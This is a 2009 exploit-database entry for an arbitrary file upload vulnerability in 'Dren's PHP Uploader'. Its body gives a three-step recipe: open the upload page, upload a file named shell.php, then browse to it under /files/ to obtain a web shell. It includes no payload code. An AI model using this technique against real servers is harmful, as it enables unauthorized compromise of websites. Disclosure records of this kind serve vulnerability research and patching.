[] NeoSense

Dren's PHP Uploader - Arbitrary File Upload

Author: Cyb3r IntRue
type: webapps
platform: php
port: 
date_added: 2009-12-27 
date_updated: 2011-06-29 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

Dren's PHP Uploader Remote File Upload Vulnerability

####################################################################################
# [+] Author : Cyb3r IntRue #
# [+]Email : r0ot@live.ru<mailto:r0ot@live.ru> & v7a@hotmail.fr<mailto:v7a@hotmail.fr> #
# [+] Date : 29/12/2009 #
# [+] Software Link : http://freewebtown.com/thanigga/Dren's%20PHP%20Uploader.rar #
# [+] Team : Avengers Team #
# [+] Dork : n/a #
####################################################################################

The exploit :

http://localhost/path/index.php


Upload shell.php ^^



Get now shell :

http://localhost/path/files/shell.php



Thanks to : HAQIQ20

#####################################################